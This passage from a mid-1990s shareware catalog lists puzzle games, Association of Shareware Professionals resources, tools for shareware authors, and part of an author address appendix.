mail support; all + ASP-wide offers (see page 6). + Look for: CWKIT200.ZIP on BBSs; CWKIT.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Features the unique ability to make puzzles in fun shapes with + over 25 predefined puzzle shapes (diamonds, doughnuts, trains, + etc) with the ability to create unlimited new shapes. Up to 30 + x 30 in size. Print options include skeleton or filled box, + answer key, font selection, metafiles & more. Teachers, + Students, Publishers and Fans: put more flare and pizzazz into + your puzzles! + + + Product: CrossWords + Author: Glen DeBiasa + Version: 2.01 (08-03-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $10.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support; bonus utilities; bonus data. + Look for: availability unknown on BBSs; CW201A.EXE on CompuServe + in CIS:GAMERS forum LIBrary 7 (or contact userID 70602,3257 for + assistance). + SWREG#: 5910 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A game whose object is to guess the theme of the crossword + puzzle. Clues are given which reveal letters in the puzzle. + Players can guess at words in the puzzle or at the puzzle's + theme after they have successfully solved a clue within the + given period of time. Instructions are provided for creating + your own puzzle files. + + Chapter 17, "Games" 629 + + + + Product: Enigmacross for Windows + Author: Crossdown (Sam Bellotto Jr.), 716-482-8092 + Version: 2.0 (11-23-95) + Needs: IBM PC, Windows 3.0 or better. 640k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; sound card. + Registration fee: $55.75 (Canadian dollars) (add $63.75 (Canadian + dollars) for shipping to Canadian addresses) (add $68.75 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited phone, fax, CompuServe, newsletter, mail support; + 2-month return policy; bonus utilities; bonus data; bonus game + hints; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades; registration commissions. + 3-month free upgrading allowed. 1 free update disk(s) sent + out. Puzzle construction and marketing assistance. + Look for: EMXWIN20.ZIP on BBSs; EMXWIN.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 70724,2075 for + assistance). + Download size: 290k (about 22 minutes with a 2400 baud modem) + Description: + Solve and construct professional acrostic puzzles exactly like + the kind in your daily or Sunday newspapers on your Windows + computer. Print out puzzles in wide variety of formats, too. + Includes ability to "hot link" your favorite digital dictionary + and features extensive on-line help as well as + speaking + messages. + + + Product: Word Search Construction Kit + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.0 (12-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM. + Registration fee: $18.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: WSKIT200.ZIP on BBSs; WSKIT.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Features the unique ability to make puzzles in fun shapes with + over 25 predefined puzzle shapes (circles, apples, hearts, etc) + with the ability to create unlimited new shapes. Up to 30 x 30 + in size. Print options include upper/lower case, grid, answer + key, font selection, metafiles and more! Teachers, Students, + Publishers and Fans: put more flare and pizzazz into your + puzzles! + + Chapter 17, "Games" 630 + + + + 17.17.2 Cryptanalysis + + Product: Crypto! + Author: KMR Consulting (Kenneth A. Reek), 716-293-3241 + Version: 2.0 (03-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $12.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, mail support; bonus utilities; bonus + data; disks of other shareware; registration commissions. 1 + free update disk(s) sent out. Bonus quotes/phrases. + Look for: CRYPTO20.ZIP on BBSs; CRYPTO.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 74034,1441 for + assistance). + SWREG#: 2317 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + A Windows version of the popular cryptogram puzzles often found + in puzzle books and the Sunday paper. It selects a puzzle from + its library of 250, encrypts it, and presents it to you to + solve. It makes solving cryptograms more fun by making it easy + to try various letters and erase mistakes. Letter frequencies + are provided, and there are various hints and helps to get you + started quickly. Complete on-line help! Even my wife plays this + game; it is one of only two that she enjoys. + + + Product: Enigmacross for Windows + Solve and construct acrostic puzzles. See full description on + page 628. + + Chapter 17, "Games" 631 + + + + 17.17.3 Word search + + Product: Finders Keepers + Author: Glen DeBiasa + Version: 1.01 (04-08-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; Hard disk; + Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Postscript printer; Epson printer; sound card. + Registration fee: $10.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support; bonus data; all ASP-wide + offers (see page 6). Bonus puzzles. + Look for: availability unknown on BBSs; FK101A.ZIP on CompuServe + in CIS:GAMERS forum LIBrary 7 (or contact userID 70602,3257 for + assistance). + SWREG#: 5911 + Download size: 340k (about 25 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A brand new way of looking at word find puzzles. Customize each + game by controlling how words are shown and by setting the + clock to challenge your skills. The words can be shown all at + once, one word at a time, or not at all. The clock can be set + from 30 seconds to 5 minutes, or can be turned completely off. + Select puzzles by title or at random. Enter your own puzzles + for endless entertainment. Print your favorite puzzles with + solutions. + + + Product: GTI WordGrid + Author: GTI Ltd, +44-973-829351 + Version: 2.1 (10-05-96) + Needs: IBM 80386, Windows 3.1 or better. VBRUN300.DLL. + Strongly recommended: SVGA monitor; sound card. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited mail support; bonus utilities; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; GTIWRD21.ZIP on + CompuServe in CIS:WINGAMES forum LIBrary 16 (or contact userID + 100661,763 for assistance). + SWREG#: 10381 + Download size: 490k (about 37 minutes with a 2400 baud modem) + Description: + A windows word puzzle game. To solve the puzzle you have to + find all the words, in the word list that you entered. These + words are hidden inside a grid of random letters. Depending on + the level you choose to play GTI WordGrid at, these words may + be in a straight line across, down, You can either solve the + + Chapter 17, "Games" 632 + + + + puzzle interactively on screen, or if you wish you can send the + puzzle to your printer and play it using pen and paper. You can + even send your puzzle to a file. + + + Product: Word Search Puzzle Maker + Author: Impact D. Publishing, 619-346-6609 + Version: 2.6 (10-05-95) + Registration fee: $15.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products. Bonus word lists and shaped puzzle grids & software + package. + Look for: WSPM26.ZIP on BBSs. + Download size: 218k (about 16 minutes with a 2400 baud modem) + Description: + This powerful tool doesn't creates over 20 variations of word + search puzzles for printout. Not only that, but you can create, + save, and reuse shaped puzzle grids. Shaped grids add visual + impact and fun to your puzzles. The printed documentation that + you receive upon registration comes with instructions on how to + use WSPM to create party games, group activities, teaching + tools, and object lessons. + + + Product: Word Search Rampage + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 3.0 (01-10-96) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $18.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, mail support; 3-month limited + return policy; all ASP-wide offers (see page 6). + Look for: WWS300.ZIP on BBSs; WWSRCH.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + A Word Search Lovers Delight! Multi-Media Ready Word Search + Puzzle Game. Play Right on Computer or Print Puzzles out for + parties, activities, friends or family. Select Colors and + Background Wallpaper. Optional Timer, Hint Mode, Highlight + Mode, Grid, Upper/Lower Case and Sound. Over 10 congratulary + remarks. Over 100 puzzles and the ability to create your own. + Many Print Options. More! + + Chapter 17, "Games" 633 + + + + 17.18 Game utilities + + Product: BassMap + Lake editor for use with BassTour/BassClass. See full + description on page 615. + + Chapter 18, "About shareware" 634 + + + + + + Chapter 18 + About shareware + + + 18.1 Assn. Shareware Professionals + + The Association of Shareware Professionals (ASP) formed in 1987 + to strengthen the future of shareware as an alternative to + traditional (retail) software marketing. It also serves as an + information clearing house for its members and the public at + large. ASP members subscribe to a code of ethics and are + committed to the shareware concept. + + The ASP demands professionalism from its members. Authors must + acknowledge every registration (you get more than just a + canceled check) and they must provide at least three months of + support for their products. ASP members must also live up to + any other benefits they offer. + + You can turn to an ombudsman for help if you can't resolve a + problem with an ASP author or disk vendor. Members must + explain this in every shareware program & disk vendor catalog. + + Few people need the ombudsman's help. ASP members represent + the cream of the crop in the shareware industry, but it's nice + to know you can turn to someone if you think you got a raw + deal. Unfortunately, it happens - authors have been kicked out + because of repeated complaints. + + The Association monitors Congress for potentially damaging + legislation and has sent spokesmen to testify before + congressional subcommittees. It has also taken on the respon- + sibility of safeguarding the term 'shareware' itself. ASP has + filed motions in countries as far away as England and South + Africa to stop people who attempt to claim it as a trademark + word. + + ASP members 'meet' online in a public forum of the CompuServe + network (GO SHAREWARE). Members send & receive messages, + transmit files, and exchange valuable information. Old hands + in the shareware business pass along their insights to new + members. The group holds public and private debates and + members vote on major issues by sending private messages to the + Association secretary. + + The ASP holds yearly 'face to face' meetings and appears at + various trade shows around the country (including COMDEX and + PC-EXPO). It also provides speakers who lecture on every + aspect of shareware. You can learn more by writing to the + Association of Shareware Professionals, 545 Grover Road, + Muskegon, MI 49442. If you have a modem and a CompuServe + + Chapter 18, "About shareware" 635 + + + + account, you can log on and go to the SHAREWARE forum for more + information. + + + Product: ASP List of Approved BBSs + Author: Association of Shareware Professionals, 616-788-5131 + Look for: availability unknown on BBSs; ASPBBS.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 2 (or contact userID 72050,1433 + for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + A complete list of ASP Approved BBSs. Gives the name, address, + phone number, conferences, lines, protocols, network + affiliations, etc. Formatted for use as a mailing list or for + browsing. Updated monthly. ASP recommends Approved BBSs. + + + Product: ASP List of Approved Vendors + Author: Association of Shareware Professionals, 616-788-5131 + Look for: availability unknown on BBSs; VENDOR.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 2 (or contact userID 72050,1433 + for assistance). + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + Complete list of ASP Approved Vendors by country and state or + province. Use this catalog to find the ASP Approved Vendor + nearest you. ASP recommends ASP Approved Vendors as one of the + best sources of high quality, up-to-date shareware programs. + Updated monthly. + + + Product: ASP Vendor Member Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (06-10-92) + Look for: availability unknown on BBSs; VNDAPP.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 + for assistance). + Download size: 5k (about one minute with a 2400 baud modem) + Description: + Contains the ASP's vendor membership application kit. + + + Product: How to join as a "beta" author + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (11-27-89) + Look for: availability unknown on BBSs; BETA.TXT on CompuServe in + CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 for + assistance). + Download size: 3k (about one minute with a 2400 baud modem) + Description: + A compilation of messages explaining how potential shareware + authors can apply for membership in the ASP before releasing + their first shareware program. + + Chapter 18, "About shareware" 636 + + + + Product: IBM PC Author Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (11-14-92) + Look for: APPLIC.ZIP on BBSs (call 317-856-2087 to download it at + no charge); AUTPUB.ZIP on CompuServe in CIS:ASPFORUM forum + LIBrary 2 (or contact userID 72050,1433 for assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + Contains all information and application forms necessary for + shareware authors and publishers to become members of the + Association of Shareware Professionals. + + + Product: Information about copyrights + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (04-29-90) + Look for: availability unknown on BBSs; CPYRT.TXT on CompuServe + in CIS:ASPFORUM forum LIBrary 4 (or contact userID 72050,1433 + for assistance). + Download size: 3k (about one minute with a 2400 baud modem) + Description: + This will help you understand more about copyright, patent, + trademark, trade secrets and other laws that affect software + developers. Especially useful for multimedia developers or + anyone using third-party materials such as music & art. The + basic principles of the laws are explained, along wiht + information on obtaining protection, avoiding infringement, and + getting licenses. + + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 295. + + Product: MacIntosh Author Application + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (09-03-92) + Look for: availability unknown on BBSs; APPLIC.SIT on CompuServe + in CIS:ASPFORUM forum LIBrary 6 (or contact userID 72050,1433 + for assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + Information on joining the Association of Shareware + Professionals as an author member. This self-extract file + contains several necessary information files and many reasons + why you would wish to join the ASP. Specific to MacIntosh + authors - see other files in this section if you program on a + different platform (Amiga or IBM PC for example). + + Chapter 18, "About shareware" 637 + + + + Product: Official ASP Catalogs + Author: Association of Shareware Professionals, 616-788-5131 + Look for: ASP####.ZIP on BBSs; CATLOG.ZIP on CompuServe in + CIS:ASPFORUM forum LIBrary 7 (or contact userID 70007,4004 for + assistance); GEN####.ZIP on GEnie in HOSB forum LIBrary 12 (or + contact userID R.ROSENBERGE for assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Official catalogs of software published by ASP members. You + can download these products and use them on a "try before you + buy" basis. Each catalog describes known ASP-member products + and in many cases identifies a BBS where you can download it at + no charge for evaluation. All products grouped by subject and + cross-referenced to authors' addresses via a comprehensive + index. Main edition covers all known ASP-member shareware; + monthly subset catalogs cover CompuServe, GEnie, and Windows & + OS/2. + + + Product: Shareware Programmer's Guide + Author: Association of Shareware Professionals, 616-788-5131 + Version: n/a (05-21-92) + Look for: availability unknown on BBSs; GUIDE.ZIP on CompuServe + in CIS:ASPFORUM forum LIBrary 2 (or contact userID 72050,1433 + for assistance). + Download size: 25k (about two minutes with a 2400 baud modem) + Description: + Contains the text of the PsL's & ASP's "Shareware Programmers' + Guide." It contains tips on writing, documenting, legally + protecting, and markeitng software via shareware. It also + lists marketing supplies and equipment and where to get them. + + + Product: Shareware Reference Guides + Author: Association of Shareware Professionals, 616-788-5131 + Needs: IBM AT (80286), DOS 3.1 or better. Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: SRG??###.ZIP on BBSs; SRGCS.ZIP on CompuServe in + CIS:ASPFORUM forum LIBrary 7 (or contact userID 70007,4004 for + assistance); SRGGE.ZIP on GEnie in HOSB forum LIBrary 12 (or + contact userID R.ROSENBERGE for assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Official ASP catalogs of software published by shareware + authors. You can download these products on a "try before you + buy" basis. Each catalog describes known shareware products + and in many cases identifies a BBS where you can download it at + no charge for evaluation. All products grouped by subject and + cross-referenced to authors' addresses. Main edition covers + all known shareware; monthly subset editions cover ASP members, + CompuServe, GEnie, DOS, OS/2, Windows, WinNT, etc. + + Chapter 18, "About shareware" 638 + + + + 18.2 For shareware authors + + Product: OWShare - Delphi + Author: Open Windows (Richard W. Bryant), 719-531-0403 + Version: 1.0 (08-06-95) + Needs: IBM 80386, Windows 3.1 or better. 512k RAM; VGA monitor; + Hard disk; Mouse; EMS memory. + Registration fee: $59.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of fax, CompuServe, mail support; lifetime + return policy; royalty-free source code; bonus utilities; all + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: OWSHR_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); OWSHR.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 186k (about 14 minutes with a 2400 baud modem) + Description: + Release professional shareware programs by using OWShare's + Delphi source code. Supports ASP-compliant time/usage + limiting, branding, site licenses, evaluation period extensions + and more!! This demo was programmed using the OWShare code and + will allow you to easily evaluate its performance. + + + Product: OWShare - VB + Author: Open Windows (Richard W. Bryant), 719-531-0403 + Version: 1.0 (09-09-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse; EMS memory; VBRUN300.DLL. + Registration fee: $59.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of fax, CompuServe, mail support; lifetime + return policy; royalty-free source code; bonus utilities; all + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: OWSHV_10.ZIP on BBSs (call 703-680-9269 to download it + at no charge); OWSHV.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 81k (about six minutes with a 2400 baud modem) + Description: + Release professional shareware programs by using OWShare's VB, + Delphi or BP7 source code. Supports ASP-compliant time/usage + limiting, branding, site licenses, evaluation period extensions + and more!! This demo was programmed using the OWShare code and + will allow you to easily evaluate its performance. + + Chapter 18, "About shareware" 639 + + + + Product: ShareMan + Author: Cordes Development (Bernd J. Cordes), +49-40-494370 + Version: 1.7 (07-30-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $25.00 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; SHAREE17.ZIP on + CompuServe in CIS:WINSHARE forum LIBrary 6 (or contact userID + 100334,375 for assistance). + SWREG#: 2936 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A utility for software distribution; LHA and crypto interface + also usable generally. Encrypt and decrypt text and files, + insert passwords, user IDs and serial numbers with + authentication digit into the program. Compress and copy files + for distribution. Create individual disks with serial number, + customer's name and company within the program, write a user ID + and store customer data in an address file. Options can be + turned on or off separately. Crypto algorithms included as + source. + + + Product: Shareware Tracker + Author: RMH Computer Services (Richard Holler), 317-782-9903 + Version: 3.11 (11-05-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, BBS, CompuServe, mail support; + 1-month return policy; bonus utilities; all ASP-wide offers + (see page 6). + Look for: SWT311*.ZIP on BBSs (multiple files) (call 317-784-2147 + to download it at no charge); SWTRK.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 6 (or contact userID 73567,1547 for + assistance). + SWREG#: 1495 + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + An office manager for the shareware author. Will track users, + submissions, expenses, upgrade sales, tech support sales, + subscription sales, source code sales, and more. It has an + appointment calendar, a module to keep track of other important + names and addresses, and a pop-up calculator. Mail-merges + letters and labels to users, with submission, and to other + authors and dealers. Many pre-defined reports, and user can + define an unlimited number his own reports. Context sensitive + help. + + Chapter 18, "About shareware" 640 + + + + Product: Universal Install + Software installation development kit. See full description on + page 413. + + + 18.3 For shareware disk vendors + + Product: Universal Install + Software installation development kit. See full description on + page 413. + + + 18.4 Software tools & add-ins + + 18.4.1 For multiple programs + + Product: Content Label Rating + Author: R.K. West Consulting (Rosemary K. West) + Version: 1.0 (10-08-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CLR10.ZIP on BBSs; CLR.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 19k (about two minutes with a 2400 baud modem) + Description: + This is a system for labeling software and packaging to + indicate contents such as violence or sexual material which may + be of special concern to parents or other consumers prior to + purchase. Its purpose is to provide software authors and + publishers with a simple, inexpensive method of labeling or + rating their products for sale or distribution in retail stores + or other environments where such labeling may be needed or + required. + + Chapter 19, "Other" 641 + + + + + + Chapter 19 + Other + + + 19.1 Software tools & add-ins + + 19.1.1 For multiple programs + + Product: CommEx + Common dialog extensions for Windows 3.1/3.11. See full + description on page 168. + + Product: Content Label Rating + Software Rating System. See full description on page 640. + + Product: File-Ex + Adds file management functions to file dlgs. See full + description on page 169. + + + 19.2 Other + + Product: The Electronic Square + Author: Electronic Creativity Products (David Archer), + 206-778-4013 + Version: 1.03 (06-19-95) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor; Mouse. + Strongly recommended: Hard disk; EMS memory. + Registration fee: $65.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 51/4" master disk(s); 12 months of + BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. + Look for: DANCER.ZIP on BBSs (call 206-778-5416 to download it at + no charge); DANCER.ZIP on CompuServe in CIS:MUSICARTS forum + LIBrary 18. + SWREG#: 4779 + PsL#: 11874 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Graphically executes the commands of square dancing, currently + through C-1. A must for callers, and useful for dancers to + learn more about square dancing. + + Chapter 19, "Appendixes" 642 + + + + + + + + + + + + + + + + + + + + PART 2 + Appendixes + + Appendix A, "Author addresses" 643 + + + + + + Appendix A + Author addresses + + This appendix cross-references each author to his or her pro- + duct(s). If you want to know where to write or call about a + particular product, look for it in the index and write down the + page number where the product name appears in this appendix. + Then turn to the appropriate page in this appendix and look up + the author. + + ------------------------------------------------------ + Please note! Many authors specify a shareware regis- + tration service's phone number in the "orders only" + phone field. These registration services can only + take product orders. They cannot offer any product + support; they cannot tell you anything about a pro- + duct; they cannot send you any brochures; and they + cannot forward any messages to the author. You must + call the "queries" or "fax" numbers listed for an + author in order to obtain support or to speak with the + author. + ------------------------------------------------------ + + + Products: ASP List of Approved BBSs, ASP List of Approved + Vendors, ASP Vendor Member Application, How to join as a "beta" + author, IBM PC Author Application, Information about + copyrights, MacIntosh Author Application, Official ASP + Catalogs, Shareware Programmer's Guide, Shareware Reference + Guides + Author: Association of Shareware Professionals + Address: 545 Grover Rd., Muskegon, MI 49442 + Fax: 616-788-2765 + Queries: 616-788-5131 + + Products: Lecture, PCFDial, Qanalyst + Author: Barn Owl Software + Address: P.O. Box 1115, O'Fallon, IL 62269 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 618-632-2339 + Queries: 618-632-7345 + + Product: Personal Calendar (PC) + Author: FunStuff Software [Paul Munoz-Colman] + Address: 11645 Charter Oak Court, Suite 201, Reston, VA + 22090-4526 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 703-435-3130 + Queries: 703-435-1110 + + Appendix A, "Author addresses" 644 + + + + Products: ProDev*EPRICE, ProDev*MEMBER Church System, + ProDev*QUOTE Quote/Bid System + Author: Pro Dev Software [George Abbott] + Address: 545 Grover Road, Muskegon, MI 49442-9427 + Orders & queries: 616-788-2243 + Accepts: American Express, MasterCard, Optima, Visa + + Products: CATALOG-ON-A-DISK, DARN! Don't Forget!, Electronic + Postal Window(tm) + Author: EmmaSoft Software Company, Inc. + Address: PO Box 238, Lansing, NY 14882-0238 + Orders & queries: 607-533-4685 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 607-533-3524 + + Products: BOXER/DOS Text Editor, BOXER/OS2 Text Editor + Author: Boxer Software [David R. Hamel] + Address: P.O. Box 3230, Peterborough, NH 03458-3230 + Orders: 800-982-6937 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 603-924-4471 + Queries: 603-924-6602 + + Product: Managing Your Food + Author: MYF Software [Greg Aakhus] + Address: 1504 Chinquapin Court, Bakersfield, CA 93309 + Orders: 800-995-1605 (orders only, please) + Accepts: MasterCard, Visa + Fax: 805-396-9442 + Queries: 805-398-1449 + + Products: GEMCAP, PC-Draft II, PC-Draft-CAD + Author: Natural Software [Michael Allen] + Address: 19 South Fifth Street, St. Charles, IL 60174 + Orders & queries: 708-377-7320 + Accepts: + + Products: BassMap, Cipher, Cipher for Windows, Dragons Bane: + Mah Jongg II, EGATrek, Mah Jongg-Solitaire, MouseTools, Second + Guess, Shooting Gallery, SuperFly, Tile Match + Author: Arcanum Computing [Nels Anderson] + Address: 585 Edmands Road, Framingham, MA 01701-3088 + Accepts: MasterCard, Visa + Fax: 508-788-1363 + + Appendix A, "Author addresses" 645 + + + + Products: DISKLIST, SHERLOCK + Author: Gulf Sierra + Address: 14809 Clavel Street, Rockville, MD 20853-1543 + Orders & queries: 301-460-0354 + + Products: Drag And View, Drag And Zip, Hard Disk Director + Author: Canyon Software [Dan Baumbach] + Address: 1537 Fourth Street, Suite 131, San Rafael, CA 94901 + Orders & queries: 415-382-7999 + Accepts: MasterCard, Visa + Fax: 415-382-7998 + + Product: Rubicon Publisher + Author: Rubicon Computer Labs Inc. + Address: Box 336, Chelsea, QC, J0X 1N0 CANADA + Orders & queries: 819-770-4317 + Fax: 819-770-4317 + + Products: EXPRESSCALC, EXPRESSCHECK, EXPRESSGRAPH, FILE + EXPRESS, ON-SIDE + Author: Expressware Corporation + Address: PO Box 1800, Duvall, WA 98019 + Orders: 800-753-3453 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 206-788-4493 + Queries: 206-788-0932 + + Product: ICP + Author: Spirit7 Software, Ltd. [Scott Bigler] + Address: PO Box 777, Waynesboro, VA 22980 + Orders & queries: 703-943-4635 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 703-943-4635 + + Products: BOOKLET, Smart10 + Author: Sympathetic Software [Stephen L Billard] + Address: 9531 Telhan Drive, Huntington Beach, CA 92646 + Orders: 800-242-4775 (orders only, please) + + Product: PopDBF + Author: Lighthouse Software, Inc. + Address: PO Box 9601, Peoria, IL 61612 + Orders: 800-242-4775 (orders only, please) + Accepts: + Fax: 309-673-9895 + Queries: 309-673-9886 + + Appendix A, "Author addresses" 646 + + + + Product: Amortz - Loan Schedules & More! + Author: Mountain View Software [Jim Bowyer] + th + Address: 7506 85 St E., Puyallup, WA 98371-6514 + Orders & queries: 206-845-2744 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Helpgen + Author: Rimrock Software + Address: P.O. Box 2406, Hayden, ID 83835-2406 + Orders & queries: 208-772-9347 + + Products: Capital Gainz, Capital Gainz for Windows + Author: AlleyCat Software, Inc. [Dave Cohen] + Address: P.O. Box 14446, RTP, NC 27709-4446 + Orders & queries: 919-542-6117 + Accepts: MasterCard, Visa + Fax: 919-542-6611-(BBS) + + Products: PATIENCE 10, Patience Abroad + Author: CoCoWare - Cowles Company Software [David A. Cowles] + Address: P.O. Box 151481, Fort Worth, TX 76108-5481 + Orders & queries: 817-367-3603 + Fax: N-A + + Product: VERSAMAP + Author: Charles H. Culberson + Address: 8 Ritter Lane, Newark, DE 19711 + Orders & queries: 302-731-0694 + + Product: Lotto Prophet + Author: DataMicro, Inc. + Address: P.O. Box 3527, Port Charlotte, FL 33948 + Orders: 800-336-7720 (orders only, please) + Fax: 813-625-2285 + Queries: 813-629-7720 + + Products: ALL-PRO League Scheduler, StatTrak for Baseball + Author: ALL-PRO Software Inc. + Address: 30 Maple View Court, Madison, WI 53719 + Orders: 800-776-7859 (orders only, please) + Accepts: MasterCard, Visa + Queries: 608-271-1586 + + Appendix A, "Author addresses" 647 + + + + Product: QA Study Aid + Author: Quid Pro Quo Software [Hal Endresen] + Address: P.O. Box 1248, Cedar Rapids, IA 52406-1248 + Orders & queries: 319-378-9140 + Accepts: MasterCard, Visa + + Products: ANARCHY, AntiC, ATC: Air Traffic Controller, Basic + Training, Bible Timeline, Bible Timeline for Windows, Border, + Capbuf, CHRONOS, CHRONOS:Windows in Time, Cryptik, Ecomaster, + Fictionary, GREEN, Palette Pleezer, PEG, Quilt, Super VGA + Puzzle, Swimsuit, Towers, UDECIDE, WEBS, WINZLE, XFIRE: Action + Puzzle game + Author: Cascoly Software [Steve Estvanik] + th + Address: 4528 36 Ave NE, Seattle, WA 98105 + Orders & queries: 206-523-6135 + Fax: 206-523-6135 + + Product: dPerfect Merge + Author: Newdorf Research [Barbara J. Feldman] + Address: 4212 North Lane, Del Mar, CA 92014 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 619-793-9933 + Queries: 619-793-8300 + + Products: QFiler, QFont + Author: Jamestown Software + Address: 2508 Valley Forge Drive, Madison, WI 53719 + Orders & queries: 608-271-2090 + + Products: FreeForm, MAXI Form, Nominal Pipe Size for Windows, + NPS - Nominal Pipe Size, Over_LAZ HP, 